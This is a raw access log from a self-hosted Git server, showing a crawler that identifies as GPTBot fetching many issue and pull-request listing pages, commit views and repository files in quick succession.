+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2finstall_service.bat" [Client 74.7.227.38] [Length 24698] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:19:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fwatchdog_service.py" [Client 74.7.227.38] [Length 25021] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:19:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d" [Client 74.7.227.38] [Length 66877] [Gzip 10.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:19:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118292] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71841] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71843] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71843] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118425] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118425] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 